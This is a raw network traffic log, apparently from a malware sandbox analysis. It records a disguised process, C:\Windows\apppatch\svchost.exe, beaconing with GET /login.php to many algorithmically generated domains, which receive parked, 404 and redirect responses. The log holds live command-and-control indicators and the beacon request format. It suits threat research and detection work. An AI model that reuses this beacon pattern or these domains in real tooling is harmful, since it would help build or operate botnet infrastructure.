                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588; expires=Mon, 11 Nov 2024 17:39:29 GMT; path=/
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:24:29.924381018 CET | 528 | IN
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTZjNTkyYzMtMDczMC00YTE5LWFhYzktYmU5YjdmMzc2NTg4IiwicGFnZV90aW1lIjoxNzMxMzQ1ODY5LCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49725 | 3.94.10.34 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:29.511807919 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
Nov 11, 2024 18:24:29.956121922 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=ff5bdea898dd26690aa630aa00e0226b|66.23.206.109|1731345869|1731345869|0|1|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49726 | 188.114.96.3 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:29.512022972 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
Nov 11, 2024 18:24:30.252443075 CET | 968 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tgW4Frr7v%2B4YMYK4qmXIjyYcjhbZzgMTnB%2BbZcez0Yv2iX6q0JO6G6siDa%2BuaCZbjE8gwivUmQLd5xNmi8Jc40eVkOWGWLqOycMggBXhh5e0W1xqOzI2tEPIw8Zo4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ff9e6ed6c0ca2-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1299&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Nov 11, 2024 18:24:31.926940918 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
Nov 11, 2024 18:24:32.262435913 CET | 811 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:32 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TgKreQzuXWX4vjdvSRfMhp%2BJGQuhMcweijgyQy%2FKVAFdHaiucC%2B%2F%2Bh6CJkf6Sh6stO9UhpHd8oeQC466XCXGg6nvOUZNmXMuvqbWGL%2BqPFKwvQx3lZSR%2F0e83h248A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0ff9f3cd5b0ca2-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=4&recv=6&lost=0&retrans=0&sent_bytes=968&recv_bytes=486&delivery_rate=2170914&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:24:32.263781071 CET | 173 | IN
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49727 | 23.253.46.64 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:29.717277050 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:24:30.172508001 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:24 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:24:30.172575951 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49728 | 99.83.170.3 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:29.811451912 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Nov 11, 2024 18:24:30.235766888 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49734 | 208.100.26.245 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:30.024241924 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:24:30.468175888 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:30.469310999 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Nov 11, 2024 18:24:30.572403908 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49735 | 44.221.84.105 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:30.029185057 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
Nov 11, 2024 18:24:30.454983950 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f4a499917f55ce41da5d9625f93ee92d|66.23.206.109|1731345870|1731345870|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49736 | 44.221.84.105 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:30.065094948 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
Nov 11, 2024 18:24:30.492614031 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=3e4d030d1d6f471974f78bdc2d59d83c|66.23.206.109|1731345870|1731345870|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49737 | 199.191.50.83 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:30.098906040 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
Nov 11, 2024 18:24:31.619031906 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:30 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            Set-Cookie: vsid=904vr478891470623201756; expires=Sat, 10-Nov-2029 17:24:30 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly
                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Ascii: a841<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <scri
Nov 11, 2024 18:24:31.619102955 CET | 212 | IN
                                                                                                                                                                                                            Data Ascii: pt>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid"
Nov 11, 2024 18:24:31.619113922 CET | 1212 | IN
                                                                                                                                                                                                            Data Ascii: in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!(
Nov 11, 2024 18:24:31.619133949 CET | 1236 | IN
                                                                                                                                                                                                            Data Ascii: ion.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase(
Nov 11, 2024 18:24:31.619155884 CET | 1236 | IN
                                                                                                                                                                                                            Data Ascii: .indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cm
Nov 11, 2024 18:24:31.619170904 CET | 424 | IN
                                                                                                                                                                                                            Data Ascii: lement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].ap
Nov 11, 2024 18:24:31.619187117 CET | 1236 | IN
                                                                                                                                                                                                            Data Ascii: ugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.
Nov 11, 2024 18:24:31.619201899 CET | 1188 | IN
                                                                                                                                                                                                            Data Ascii: .substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a|
Nov 11, 2024 18:24:31.619215965 CET | 1236 | IN
                                                                                                                                                                                                            Data Ascii: dEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if
Nov 11, 2024 18:24:31.619227886 CET | 1236 | IN
                                                                                                                                                                                                            Data Ascii: eturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiRe
Nov 11, 2024 18:24:31.624108076 CET | 1236 | IN
                                                                                                                                                                                                            Data Ascii: alse)}};window.cmp_addFrame("__cmpLocator");if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.10 | 49738 | 23.253.46.64 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:30.198434114 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:24:30.884193897 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:24 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:24:30.884222031 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
Nov 11, 2024 18:24:30.884351015 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.10 | 49741 | 154.212.231.82 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:30.443002939 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:24:31.354679108 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:24:31.355887890 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Nov 11, 2024 18:24:31.720772028 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.10 | 49747 | 178.162.203.202 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:30.648385048 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.10 | 49974 | 178.162.203.202 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:01.584044933 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.10 | 49994 | 13.248.169.48 | 80 | 7908 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:10.037652016 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
